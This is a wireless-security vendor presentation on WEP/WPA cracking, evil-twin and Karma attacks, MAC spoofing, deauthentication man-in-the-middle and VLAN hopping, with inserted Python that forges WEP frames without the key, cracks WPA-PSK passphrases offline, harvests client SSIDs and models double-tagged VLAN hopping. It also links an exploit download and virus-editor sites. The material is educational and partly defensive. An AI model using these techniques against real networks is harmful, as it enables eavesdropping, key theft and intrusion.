![Page 1: Www.airdefense.net War of the Airwaves Wireless Hacks & Defenses Richard Rushing Chief Security Officer AirDefense, Inc. rrushing@airdefense.net](https://reader037.vdocuments.mx/reader037/viewer/2022110322/56649d215503460f949f63f7/html5/thumbnails/1.jpg)
www.airdefense.net
War of the Airwaves Wireless Hacks & Defenses
Richard Rushing, Chief Security Officer
AirDefense, Inc. rrushing@airdefense.net
Copyright © 2002-2007 AirDefense Proprietary and Confidential.
Get Ready for the Untethered World!
Wired Network Security Architecture
Diagram: a secure enterprise perimeter separates the Internet (viruses & malware, attackers, data theft) from the intranet (desktops, servers). The threat that remains inside the perimeter is the insider.
Wireless Threats to Enterprise Networks
Diagram: hacker outside; intranet with desktop, server, AP, laptop and mobile user; a municipal Wi-Fi AP and an evil twin next door.
1 Rogue AP connected to the network
2 Leaked wired traffic & insertion
3 Non-compliant AP
4 Neighboring AP
5 Users bypassing network security controls
6 Wi-Fi phishing (municipal Wi-Fi AP evil twin)
Municipal Wi-Fi aggravates threats to enterprise networks. Everyone is on the inside.
Characteristics of Wireless Networks
1 Shared, uncontrolled media: invisible, airborne threats are hard to control compared with a wired network.
2 Self-deploying & transient networks: the simplicity of self-discovery creates security challenges; the mobile nature of WLAN devices and users requires in-depth forensics capability to address security breaches.
3 User indifference: invisible connectivity and the truly distributed nature of WLANs give a faulty sense of security.
4 Easier to attack: lax WLAN security is the lowest-hanging fruit for hackers; dozens of tools are readily available to exploit these holes.
Air vs. wire: wireless networks pose higher risks than wired networks.
Layered Approach to Security
Diagram: wired security tools (secure perimeter, firewalls, anti-virus, content filtering, SSL VPN) cover wired networks; AirDefense covers wireless networks. Attack sophistication and damage rise through the layers; the predominant attacks increase the vulnerability of the upper layers.
Wireless Attack Surface
Signal emitted from a single access point.
Just a Little WiGLE
Over 11 million networks... with GPS...
I know all your secrets!
Security is Never About Just Good Enough
Run your firewall for 6 minutes a day
Turn off your IDS
Allow all traffic through your firewall
Leave doors unlocked
Leave keys in the car
Wireless Data Breaches in Retail
Agenda
Wireless Risks & Attacks
Best Practices for Wireless Security
The AirDefense Solution
Introduction to Wireless Security
Q&A
Attacking the RF Medium
Passive Listening
Wired Network Leakage
Injection
Jamming
Breaking WEP
Wireless Sniffing
Why & what happens
Any clear-text is heard by everyone
If you are using WEP, remember everyone has YOUR key
Very common at hotspots
Hashes are clear-text
Most services still authenticate over clear-text, no tunnels
Internal/corporate servers are at higher risk due to lower security
It's Encrypted. Is it really encrypted??
In some APs, "Both" (WEP optional) is the typical security setting
Nothing shows whether the data is actually encrypted
The #1 AP vendor: Enable WEP, MIC, and TKIP
Set the WEP level and enable TKIP and MIC: "If you enter optional, client devices can associate to the access point with or without WEP enabled. You can enable TKIP with WEP set to optional but you cannot enable MIC. If you enter mandatory, client devices must have WEP enabled to associate to the access point. You can enable both TKIP and MIC with WEP set to mandatory."
www.cisco.com
WEP Summary of Attacks
23 known attacks against WEP. WEP weaknesses:
Lack of IV replay protection
Short IV sequence space
RC4 vulnerabilities due to WEP's implementation
Linear properties of CRC32 (allows bit flipping)
Lack of a keyed message integrity check (MIC)
Use of shared keys
Shows that implementation is VERY IMPORTANT
Ultimate hacking tool for WEP: http://www.aircrack-ng.org/
Breaking WEP
2001 Un-crackable
2003 Years
2004 Days
2005 Hours
2006 Minutes
2007 Seconds
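The "linear properties of CRC32" bullet above is the one attack on the list that needs no key recovery at all, so here is an added example (not from the slides) that shows it end to end: a WEP frame is encrypted with real RC4 and a CRC-32 ICV, then an attacker who never learns the key flips chosen plaintext bits in the ciphertext and patches the ICV so the receiver still accepts the frame. The 40-bit key, IV and HTTP-style payload are constructed for the demo.

```python
"""Added example: WEP bit flipping via CRC-32 linearity.  RC4 keying (IV || key)
and the ICV placement follow WEP; key, IV and plaintext are constructed."""
import struct
import zlib

WEP_KEY = bytes.fromhex("0123456789")          # constructed 40-bit WEP key


def rc4(key: bytes, n: int) -> bytes:
    """Plain RC4 keystream of n bytes (KSA followed by PRGA)."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def wep_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """Frame = IV || RC4(IV || key) XOR (plaintext || CRC32(plaintext))."""
    icv = struct.pack("<I", zlib.crc32(plaintext))
    body = plaintext + icv
    ks = rc4(iv + key, len(body))
    return iv + bytes(a ^ b for a, b in zip(body, ks))


def wep_decrypt(key: bytes, frame: bytes):
    """Receiver side: return (plaintext, icv_ok)."""
    iv, ct = frame[:3], frame[3:]
    ks = rc4(iv + key, len(ct))
    body = bytes(a ^ b for a, b in zip(ct, ks))
    pt, icv = body[:-4], body[-4:]
    return pt, struct.unpack("<I", icv)[0] == zlib.crc32(pt)


def flip_bits(frame: bytes, delta: bytes) -> bytes:
    """Attacker side, no key: XOR delta into the ciphertext and patch the ICV.
    For equal-length inputs crc32(p ^ d) == crc32(p) ^ crc32(d) ^ crc32(zeros),
    and XOR commutes with the RC4 keystream, so the patched ICV still verifies."""
    iv, ct = frame[:3], frame[3:]
    n = len(ct) - 4
    assert len(delta) == n, "delta must cover the whole plaintext"
    icv_delta = struct.pack("<I", zlib.crc32(delta) ^ zlib.crc32(bytes(n)))
    return iv + bytes(a ^ b for a, b in zip(ct, delta + icv_delta))


def demo():
    """Forge a request without the key; returns what the receiver decrypts and whether its ICV check passes."""
    plaintext = b"GET /balance?acct=1000 HTTP/1.0"   # constructed payload
    frame = wep_encrypt(WEP_KEY, bytes.fromhex("a1b2c3"), plaintext)
    # The attacker knows the plaintext layout (ARP, HTTP, DNS are predictable), not the key.
    wanted = b"GET /balance?acct=2000 HTTP/1.0"
    delta = bytes(a ^ b for a, b in zip(plaintext, wanted))
    forged = flip_bits(frame, delta)
    return wep_decrypt(WEP_KEY, forged)
```

This is exactly why the slide stresses the lack of a keyed MIC: a CRC is a checksum for noise, not an authenticator, and TKIP's Michael MIC and CCMP's CBC-MAC were introduced to close this hole.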
WPA-PSK
The PSK version of WPA suffers from an offline dictionary attack because the information required to create and verify a session key is BROADCAST.
In WPA, the PMK (master key) is produced by running a special function on a pre-shared passphrase and an SSID. Both the host and the AP use this PMK, along with MAC addresses and nonces, to create the PTK (session key):
PMK = PBKDF2(passphrase, ssid, ssidLength, 4096, 256)
PTK = PRF-512(PMK, "Pairwise key expansion", Min(AP_Mac, Client_Mac) || Max(AP_Mac, Client_Mac) || Min(ANonce, SNonce) || Max(ANonce, SNonce))
Four-way handshake (client and access point both hold the PMK; the client picks SNonce, the AP picks ANonce):
1. AP to client: EAPOL-Key (ANonce); the client derives the PTK
2. Client to AP: EAPOL-Key (SNonce, MIC, RSN IE); the AP derives the PTK
3. AP to client: EAPOL-Key (ANonce, MIC, RSN IE); the client installs keys
4. Client to AP: EAPOL-Key (MIC); the AP installs keys
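The key schedule on this slide, carried through in code, as an added example that is not part of the original deck: PBKDF2 for the PMK and the 802.11i PRF-512 for the PTK, then the offline dictionary attack the slide describes, which re-derives the message-2 MIC for each candidate passphrase until one matches the captured value. PBKDF2 and PRF-512 follow IEEE 802.11i (the standard's own test vector, passphrase "password" with SSID "IEEE", is checked in a comment); the SSID, MAC addresses, nonces, simplified EAPOL frame and word list are constructed for the demo.

```python
"""Added example: WPA-PSK key derivation and the offline PSK dictionary attack.
Derivation follows IEEE 802.11i; all capture data below is constructed."""
import hashlib
import hmac


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 iterations, 256 bits).
    802.11i test vector: ("password", "IEEE") -> f42c6fc5 2df0ebef ... 9710a12e."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    """802.11i PRF-512: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0..3, truncated to 64 bytes."""
    out = b"".join(
        hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest() for i in range(4)
    )
    return out[:64]


def derive_ptk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK = PRF-512(PMK, "Pairwise key expansion", min/max of MACs || min/max of nonces)."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    return prf_512(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck: bytes, eapol_zero_mic: bytes) -> bytes:
    """WPA2/CCMP key MIC: HMAC-SHA1(KCK, EAPOL frame with MIC field zeroed)[:16].
    KCK is the first 16 bytes of the PTK.  (WPA/TKIP uses HMAC-MD5 here instead.)"""
    return hmac.new(kck, eapol_zero_mic, hashlib.sha1).digest()[:16]


# --- constructed handshake capture: everything here travels in the clear ------
SSID = "CorpWiFi"
AP_MAC = bytes.fromhex("00112233aabb")
STA_MAC = bytes.fromhex("0099887766ee")
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
# Simplified message 2: 802.1X header, descriptor type, key info, key length,
# replay counter, SNonce, key IV, RSC, key ID, zeroed MIC, key-data length.
EAPOL_MSG2 = (b"\x01\x03\x00\x75\x02" + b"\x01\x0a" + b"\x00\x10" + b"\x00" * 8
              + SNONCE + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8 + b"\x00" * 16 + b"\x00\x00")


def sniffed_mic(passphrase: str) -> bytes:
    """Stand-in for the captured MIC: what the real client computes from the real passphrase."""
    ptk = derive_ptk(pmk_from_passphrase(passphrase, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)
    return eapol_mic(ptk[:16], EAPOL_MSG2)


def crack(captured_mic: bytes, wordlist):
    """Offline attack: PMK -> PTK -> KCK -> MIC per candidate; the cost is 4096 HMAC-SHA1 per word,
    which is why precomputed PMK tables per SSID (next slide) pay off."""
    for word in wordlist:
        pmk = pmk_from_passphrase(word, SSID)
        kck = derive_ptk(pmk, AP_MAC, STA_MAC, ANONCE, SNONCE)[:16]
        if eapol_mic(kck, EAPOL_MSG2) == captured_mic:
            return word
    return None
```

Note that nothing in `crack` depends on traffic after the handshake: two EAPOL-Key frames (or a deauth to force a fresh handshake) are all an attacker needs to take the problem offline, and the SSID being part of the PBKDF2 salt is the only thing that stops one rainbow table from covering every network.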
WPA Tools (Easier than WEP)
http://sourceforge.net/projects/ptcrack/ : a hybrid dictionary/brute-force passphrase search tool for PMK discovery on 802.11 networks using WPA with pre-shared keys (PSKs)
coWPAtty 3.0 (http://www.churchofwifi.org) is designed to audit the security of pre-shared keys selected in Wi-Fi Protected Access (WPA) networks
Rainbow-like tables: http://umbra.shmoo.com:6969/torrents/wpa_psk-h1kari_renderman.torrent The resulting list is ~1,000,000 words, for a total of approximately 40 GB of hash tables for the top 1000 SSIDs
Aircrack-ng: built-in WPA cracker since version 2.3, http://www.aircrack-ng.org/
WPA Cracker (http://www.tinypeap.com/page8.html) is a brute-force password cracker; all information is entered manually
Rogue Squadron WRT firmware: http://airsnarf.shmoo.com/rogue_squadron/index.html
If you use a 21-character passphrase, are you safe? How many clients and APs let you enter 31 characters? What happens when you reach and overlap with the SSID?
2006: 80 keys per second
2007: 130 keys per second
2007: 30,000 keys per second
What in the Air can Kill You? #1 Corporate Vulnerability
Even if the data is encrypted, the services that run by MAC address can be detected
Remember wireless is LAYER 2; it will send out all Layer 2 traffic: VRRP, HSRP, Spanning Tree, OSPF, VTP/VLAN, CDP
VLANs don't help unless filtered
MOST USE HASHES or PASSWORDS in clear-text
Broadcast/multicast key rotation is OFF by default
Client devices using static WEP cannot use the access point when you enable broadcast key rotation
It's a two-way street: what goes out can also come in!
![Page 18: Www.airdefense.net War of the Airwaves Wireless Hacks & Defenses Richard Rushing Chief Security Officer AirDefense, Inc. rrushing@airdefense.net](https://reader037.vdocuments.mx/reader037/viewer/2022110322/56649d215503460f949f63f7/html5/thumbnails/18.jpg)
Copyright © 2002-2007 AirDefense Proprietary and Confidential.
Injection of Traffic
Yersinia is a network tool designed to take advantage of some weaknesses in different network protocols. It pretends to be a solid framework for analyzing and testing the deployed networks and systems. http://www.yersinia.net
Attacks: Spanning Tree Protocol (STP), Cisco Discovery Protocol (CDP), Dynamic Trunking Protocol (DTP), Dynamic Host Configuration Protocol (DHCP), Hot Standby Router Protocol (HSRP), 802.1Q, 802.1X, Inter-Switch Link Protocol (ISL), VLAN Trunking Protocol (VTP)
Current exploits:
Cisco CatOS VLAN Trunking Protocol Remote Command Execution Vulnerability
Cisco IOS Multiple VLAN Trunking Protocol Code Execution and DoS Vulnerabilities
Cisco Intrusion Prevention and Detection Systems DoS and Security
Cisco Access Point Web-browser Interface Unauthorized Administrative Access and Bypass Issue
Attacking Clients
Wireless Fuzzing
Mobile Workers
Windows Zero-Configuration
Hotspots
Station Impersonation
Bridging Interfaces
Wireless Printers
Clients: All Shapes and Sizes
Hotspots, Wi-Fi phones
Free access via OUI
Many ways to attack clients: scan, exploit, repeat
But why do you have to? Have the client come to you! YOU KNOW WHAT THEY WANT!!!!!!!
The client sends a probe request for the network it wants; answer it with a soft AP carrying that SSID
Attacking Wireless Clients: Packets of Death
Plenty of them, from handheld devices to laptops
Most are BAD packets, usually management or control frames; some are data
WEP cracking is adding to the packets
Fuzzing
Most are using cut-through data rates (5.5 Mbps for beacon frames)
Most are simple buffer overflows; lots of things that go BOOM
Client software, authentication supplicants
http://www.802.11mercenary.net/lorcon/
Client MAC Address Spoofing
MAC filtering is not enough
1. Find the MAC address of an authorized user station (MAC 00 02 2D 50 D1 4E, a Cisco 350)
2. Change the MAC of the attacker's card (SMAC, regedit): original MAC 00 12 2D 50 43 1E (Orinoco Gold), new MAC 00 02 2D 50 D1 4E
3. Re-initialize the card
4. Associate to the AP as the spoofed station
SMAC (www.klcconsulting.net/smac) is a MAC address modifying utility (spoofer) for Windows 2000/XP and Server 2003 systems, regardless of whether the manufacturers allow this option or not.
How Not to Attack a Client
Diagram: intruder laptop acting as a soft AP; user station inside the corporate network. Municipal Wi-Fi increases the evil twin attack surface. Labels: Wired Thinking; Attack.
1. Laptop sends probe request
2. AP responds to probe request
3. Naive user associates with the AP
4. AP provides IP address to user
5. Scan laptop for Windows vulnerabilities & compromise it
6. Use user station as a launch pad
Windows Wireless Zero Configuration
1. Wireless Auto Configuration attempts to connect to the preferred networks that appear in the list of available networks, in preferred-network preference order
2. If there are no successful connections, Wireless Auto Configuration attempts to connect to the preferred networks that are hidden wireless networks (no SSID in the beacon)
3. If there are no successful connections and there is an ad hoc network in the list of preferred networks that is available, Wireless Auto Configuration tries to connect to it
4. If there are no successful connections, Wireless Auto Configuration configures the wireless network adapter to act as the first node in the ad hoc network
5. If there are no successful connections to preferred networks, there are no ad hoc networks in the list of preferred networks, and "Automatically connect to non-preferred networks" is enabled, it tries the non-preferred networks. If all connection attempts to non-preferred networks fail, Wireless Auto Configuration creates a random wireless network name and places the wireless network adapter in infrastructure mode
6. If the Windows wireless client is already connected to a wireless network but a more preferred wireless network becomes available, Wireless Auto Configuration disconnects from the currently connected wireless network and attempts to connect to the more preferred wireless network
Wireless Phishing
Tools such as Karma can respond to ANY client probe request and offer a variety of services (POP, FTP and HTTP) to lure unsuspecting users
No authentication of the "pervasive wireless cloud"
Automatic network selection in Windows (Zero Configuration client) and Macs is dangerous
Enterprises need to manage centralized policies
Karma (http://theta44.org/karma/index.html)
AirSnarf (http://airsnarf.shmoo.com/)
DHCP and DNS Client Attacks
Since they took the hook, now they ask for more: hungry fish
"Give me an IP address": give them an address that is likely excluded from personal firewalls (10.X.X.X, 192.168.X.X, 172.16.X.X), or the IP address they are looking for
DHCP attack: the exploit attacks a client and creates an admin user on the device
DHCP broadcast attack (MS06-036): http://www.milw0rm.com/sploits/07212006-MS06_036_DHCP_Client.tar.gz
DNS attack/manipulation: "I am DNS, I am the Internet" - Cricket Liu
Can offer anything to you, and you believe it
Sites: banking, hotel, airlines, work (Exchange, Oracle, SQL)
Data Seepage
Your notebook is not location-aware: office, home or hotspot
Interfaces are active in order; the last interface is usually Wi-Fi
It always wants to connect to something; all it takes is someone offering a connection
Office, home, hotspot: all the data is the same (company name, servers, clients, applications, and more...)
What am I connected to?
Real-World Wireless Issues
Zero-Day Attacks
Hotspots
Exploiting is too Easy!
vx.netlux.org: MVBSWE, worm editors, virus editors, script editors
Do you trust your hotspot web page?
Corporate guest access?
Zero Day Alerts
http://www.frsirt.com/
http://www.cert.org
http://nvd.nist.gov
FrSIRT delivers vulnerability and threat alerts, 24/7, 365 days a year, to inform organizations of new potential threats. Our services are designed to deliver notification of vulnerabilities and exploits as they are identified, providing timely, actionable information and guidance to help mitigate risks before they are exploited.
Zero-Day: New Attacks
Zero-day attacks against known services
Zero-day attacks against IE, Firefox
Remote exploits: I am on your system as YOU!
New Trojans and viruses ready for injection
Favorite new exploits: WMF, Media Player, Java exploits
www.milw0rm.com
Adding to Metasploit Framework
Wireless-enabled driver-level exploits
Point-and-click exploits; exploits for zero-day attacks
Numerous payloads: numerous ways to take over your computer
Enumeration of Wireless Devices
Password Sniffing & Cracking
Hacking Password Hashes
Breaking VPNs over Wireless
Listening to VoIP Conversations
One-way Insertion Attacks
Zero-day Attacks
Snarfing
Hacking Password Hashes
Get virtually any password, offline & passive: LEAP, PPTP, MS-CHAPv2, MD5
Search a hash list to find the password; a large password list is used to generate the hashes (requires 3-5 GB of space)
Rainbow tables are indexed hash lists (require 2-3 TB of space); known tables exist for up to 14 characters
http://rainbowtables.shmoo.com/
http://www.antsight.com/zsl/rainbowcrack/
http://www.rainbowcrack-online.com/
Man-in-the-Middle Attack: WLAN-Jack & Air-Jack Tools
Allows the attacker to: intercept ALL communications between the client & AP; pretend to be the client without disrupting the client's session at Layer 2
Possible due to: management frames' lack of authentication; lack of AP authentication
Step 1: Disassociate the target station from the AP by spoofing the MAC of the AP and sending Disassociate & Deauth frames
Step 2: Attacker re-associates the target to the malicious station and connects to the AP
Diagram: target, server, AP and a dual-card attacker
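Both sides of the last few slides work from the same unauthenticated management frames, so one added example (not part of the deck) covers them with a single minimal 802.11 management-frame parser. Attacker view, for the probe-request and Karma slides: harvest the SSIDs each client leaks in directed probe requests, which is the preferred network list a soft AP should impersonate. Defender view, for the WLAN-Jack/Air-Jack step 1 above: count deauthentication and disassociation frames per (BSSID, target) and flag a flood, the signature a WIDS sensor looks for. The frames are hand-built (no radiotap header, no FCS); the threshold is an assumption.

```python
"""Added example: parse 802.11 management frames; harvest probe-request SSIDs
(attacker) and detect deauth/disassoc floods (defender).  Frames constructed."""
import struct
from collections import Counter, defaultdict

PROBE_REQ, DISASSOC, DEAUTH = 4, 10, 12         # management frame subtypes
TAG_SSID = 0                                     # tagged parameter: SSID


def parse_mgmt(frame: bytes):
    """Return subtype, addresses, reason code and tagged parameters of a management frame, else None."""
    fc = struct.unpack_from("<H", frame, 0)[0]
    if fc & 0x0C != 0:                           # frame-control type bits: 0 = management
        return None
    subtype = (fc >> 4) & 0x0F
    da, sa, bssid = frame[4:10], frame[10:16], frame[16:22]
    body = frame[24:]                            # sequence control sits at 22..24
    fixed = 2 if subtype in (DEAUTH, DISASSOC) else 0   # reason code precedes any tags
    reason = struct.unpack_from("<H", body, 0)[0] if fixed and len(body) >= 2 else None
    tags, pos = {}, fixed
    while pos + 2 <= len(body):                  # TLV walk: id, length, value
        tid, tlen = body[pos], body[pos + 1]
        tags[tid] = body[pos + 2:pos + 2 + tlen]
        pos += 2 + tlen
    return {"subtype": subtype, "da": da, "sa": sa, "bssid": bssid, "reason": reason, "tags": tags}


def harvest_pnl(frames):
    """Attacker: client MAC -> SSIDs it probes for.  An empty SSID is a broadcast probe and leaks nothing."""
    pnl = defaultdict(set)
    for f in frames:
        m = parse_mgmt(f)
        if m and m["subtype"] == PROBE_REQ and m["tags"].get(TAG_SSID):
            pnl[m["sa"].hex(":")].add(m["tags"][TAG_SSID].decode(errors="replace"))
    return dict(pnl)


def detect_deauth_flood(frames, threshold: int = 5):
    """Defender: (bssid, target) pairs with more than `threshold` deauth/disassoc frames (threshold assumed)."""
    counts = Counter()
    for f in frames:
        m = parse_mgmt(f)
        if m and m["subtype"] in (DEAUTH, DISASSOC):
            counts[(m["bssid"].hex(":"), m["da"].hex(":"))] += 1
    return [pair for pair, n in counts.items() if n > threshold]


# --- constructed sample capture -------------------------------------------
def mgmt_frame(subtype: int, da: bytes, sa: bytes, bssid: bytes, body: bytes = b"") -> bytes:
    """Build a management frame: frame control (type 0, given subtype), duration, 3 addresses, seq ctl, body."""
    return struct.pack("<HH", subtype << 4, 0) + da + sa + bssid + struct.pack("<H", 0) + body


def ssid_tag(name: bytes) -> bytes:
    return bytes([TAG_SSID, len(name)]) + name


BCAST = b"\xff" * 6
CLIENT = bytes.fromhex("0099887766ee")           # constructed station MAC
AP = bytes.fromhex("00112233aabb")               # constructed AP BSSID

SAMPLE = (
    [mgmt_frame(PROBE_REQ, BCAST, CLIENT, BCAST, ssid_tag(b"CorpWiFi")),
     mgmt_frame(PROBE_REQ, BCAST, CLIENT, BCAST, ssid_tag(b"linksys")),
     mgmt_frame(PROBE_REQ, BCAST, CLIENT, BCAST, ssid_tag(b""))]
    # 20 spoofed deauths "from" the AP to the client, reason 7 (class 3 frame from nonassociated STA)
    + [mgmt_frame(DEAUTH, CLIENT, AP, AP, struct.pack("<H", 7)) for _ in range(20)]
)
```

The two halves are the same observation read from opposite sides: nothing in a probe request, deauth or disassociate frame is authenticated, so a client will announce its home networks to anyone listening and accept a disconnect from anyone who writes the AP's address into a frame. The 802.11w management frame protection that came later is what finally closes the deauth half.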
Snarfing Hot Spots
Security question: connecting to an untrusted network and launching the most vulnerable program you have just screams "EXPLOIT ME"!!!!
Fake web pages steal your hotspot password
Evil web pages infect your PC with malware
My web pages steal your NT password: 1x1 pixel, cross-site scripting, installs Trojans, installs spyware, opens back doors, changes the registry, adds a user account, shares files and such
Oops, you just opened a web page, that's all!!!!!
Next Generation Wireless Attacks
802.1X state machine: client-initiated disconnection; assumes everyone plays nice
Fuzzing attacks will expand: Intel driver issues, 802.1X supplicant issues, AP issues
Exploit more EAP types: TLS is not secure in Windows
Windows Vista: wireless stack rewritten
Good news: support for many EAP types, provided for XP too
Bad news: hacking tools ported to Windows; built-in network address spoofing; point-and-click "hacking"
Firewall Myths: the "firewall only" approach to network security
Firewalls cannot stop rogue wireless devices
Firewalls do not eliminate the need for wireless scanning for rogues
Firewalls do not protect against wireless attacks
Once a hacker is on the network they can punch through open ports
Access control lists are weaker than firewalls
Best bet is to keep hackers off the network
VPN Myths: a Layer 3 solution to a Layer 2 problem
The VPN still allows the hacker to get onto the open Wi-Fi network and exploit the network or clients for weaknesses
The client cannot run on many embedded devices (e.g., wireless scanners, VoWi-Fi handsets, etc.)
Subnet roaming is problematic
Less performance and more overhead
Break weak encryption & authentication: re-authentication on weak ciphers; dictionary attacks on weak ciphers
Protocol & server flaws exposed: IKE aggressive mode, pre-shared keys, exploiting bugs in the VPN server
Diagram labels: Wireless Security, WIPS, VPN
VLANs: Virtual Local Area Networks
A logical grouping of devices or users; users can be grouped by function, department or application, regardless of physical segment location
VLAN configuration is done at the switch (Layer 2)
WIRELESS is not the SAME (spoofing is EASY)
VLAN membership:
Static VLAN assignment (port-based membership): membership is determined by the port on the switch and not by the host.
Dynamic VLAN assignment: membership is determined by the host's MAC address. The administrator has to create a database with MAC addresses and VLAN mappings.
Guest Networking Issues on VLANs
Guest access to the Internet via WLAN: the WLAN client gets its IP address from a DHCP server that sits in the corporate network, including DNS server credentials
Sometimes there is a split, but that does not help either... as the DNS server is still in the corporate LAN...
Issues: DHCP DoS, DNS DoS, VLAN hopping, among others
Diagram: guest client, access point, WLAN SSID, DHCP server, DNS server, Internet. An 802.1Q VLAN is used as the guest "tunnel"; the DHCP address supplied contains the DNS server information; DNS requests from the client go to the corporate DNS server.
VLAN Hopping
Diagram: SSIDs Corp (WPA2), Guest, OLD (WEP only) and VoIP (VoIP client), each mapped to a VLAN. Where does the guest end up: Guest? Corp? OLD?
Basic VLAN hopping attack: the attacker fools the switch into thinking that he is a switch that needs trunking
Double-encapsulated VLAN hopping attack: switches perform only one level of IEEE 802.1Q decapsulation. This allows the attacker to specify a .1Q tag inside the frame, so the frame goes to a VLAN other than the one the outer tag specified
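The double-encapsulated attack above, built and run as an added example (not from the deck): an Ethernet frame carries two stacked 802.1Q tags, a toy model of the first switch strips exactly one tag because the outer VID equals the trunk's native VLAN, and the second switch delivers the frame by whatever tag is left. The VLAN IDs, MAC addresses and the switch model are constructed; the tag layout (TPID 0x8100, 3-bit PCP, DEI, 12-bit VID) is the real 802.1Q format.

```python
"""Added example: 802.1Q double tagging and single-level decapsulation.
Frame fields follow IEEE 802.1Q; VLAN numbers and switch behaviour are a model."""
import struct

ETH_8021Q = 0x8100
ETH_IPV4 = 0x0800


def vlan_tag(vid: int, pcp: int = 0) -> bytes:
    """TPID 0x8100 followed by TCI = PCP(3) | DEI(1) | VID(12)."""
    return struct.pack(">HH", ETH_8021Q, (pcp << 13) | (vid & 0x0FFF))


def build_frame(dst: bytes, src: bytes, tags, payload: bytes) -> bytes:
    """Ethernet II frame with zero or more stacked 802.1Q tags, outermost first."""
    return dst + src + b"".join(vlan_tag(v) for v in tags) + struct.pack(">H", ETH_IPV4) + payload


def parse_tags(frame: bytes):
    """Return (VIDs outermost-first, inner ethertype, payload)."""
    pos, vids = 12, []
    while struct.unpack_from(">H", frame, pos)[0] == ETH_8021Q:
        vids.append(struct.unpack_from(">H", frame, pos + 2)[0] & 0x0FFF)
        pos += 4
    return vids, struct.unpack_from(">H", frame, pos)[0], frame[pos + 2:]


def ingress_switch(frame: bytes, native_vlan: int) -> bytes:
    """Attacker-side switch: a frame tagged with the trunk's native VLAN is sent untagged on the trunk,
    i.e. exactly one tag is popped.  Anything underneath is forwarded untouched."""
    vids, _, _ = parse_tags(frame)
    if vids and vids[0] == native_vlan:
        return frame[:12] + frame[16:]           # drop the 4-byte outer tag only
    return frame


def egress_switch(frame: bytes, native_vlan: int) -> int:
    """Far-side switch: delivers to the outermost remaining tag, or the native VLAN if untagged."""
    vids, _, _ = parse_tags(frame)
    return vids[0] if vids else native_vlan


def double_tag_attack(guest_vlan: int, target_vlan: int) -> int:
    """Attacker sits in guest_vlan, which is also the trunk's native VLAN; returns the VLAN the frame lands in."""
    frame = build_frame(b"\xff" * 6, bytes.fromhex("0099887766ee"), [guest_vlan, target_vlan], b"ping")
    return egress_switch(ingress_switch(frame, native_vlan=guest_vlan), native_vlan=guest_vlan)


def mitigated(guest_vlan: int, target_vlan: int, unused_native_vlan: int) -> int:
    """Fix: the trunk's native VLAN is an unused VLAN that no access port belongs to,
    so the attacker's outer tag never matches and is never stripped."""
    frame = build_frame(b"\xff" * 6, bytes.fromhex("0099887766ee"), [guest_vlan, target_vlan], b"ping")
    return egress_switch(ingress_switch(frame, native_vlan=unused_native_vlan), native_vlan=unused_native_vlan)
```

Two things the model makes visible: the attack only works when the attacker's VLAN is the native VLAN of the trunk, which is why "native VLAN = an unused VLAN, tagged on the trunk" is the standard fix; and it is one-way, since replies from the target VLAN have no matching path back, which is exactly the "one-way insertion attack" named on the agenda slide.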
Why VLAN do not Work for Wireless Making Logical on a Physical Media
Not Making Logical on a Virtual media
Design on Port usage
No Physical Ports on Wireless
45
Page 46
Agenda
Introduction to Wireless Security
Wireless Risks & Attacks
Best Practices for Wireless Security
The AirDefense Solution
Q&A
Page 47
Recommended Wireless Security Strategy
Contain and control authorized wireless devices, both inside owned facilities and outside at hotspots, municipal Wi-Fi zones and home
Automatically keep all unauthorized wireless devices off the entire wired network all the time
Continually assure strong security configurations and policies 24x7 on all authorized wireless devices
Accurately detect (WIDS) and automatically defend (WIPS) against the greatest number of wireless attacks possible
Store and data mine long-term, forensics-quality information for investigations and diagnosing wireless problems
Measure and prove compliance with regulatory wireless security policies and controls
Page 48
Wireless Security Cannot Mitigate All Risks
Some protocols are flawed
It's the Internet all over again: Telnet, FTP, HTTP; we still use them
Risk vs. threats
Shared medium: easy to compromise
Remediation is key
Monitoring is key
Page 49
Summary
Wireless is a business enabler and part of every network
Unmonitored wireless networks make the entire network infrastructure vulnerable
Lack of policy compliance can result in regulatory liabilities
AirDefense offers market-leading solutions to provide visibility and control of all wireless assets, regardless of location
AirDefense solutions are trusted by the most security-sensitive organizations in the world
AirDefense solutions are cost-effective & provide the lowest TCO
Page 50
Contact us
Web: www.AirDefense.NET
HQ Phone: 770-663-8115
Demo of laptop products available on www.AirDefense.NET
Contact: Anthony Perridge
Vice President, International
+44 1628 509058
http://www.airdefense.net/seminars/airdefense_europe_oct_2007.pdf
Page 51
Summary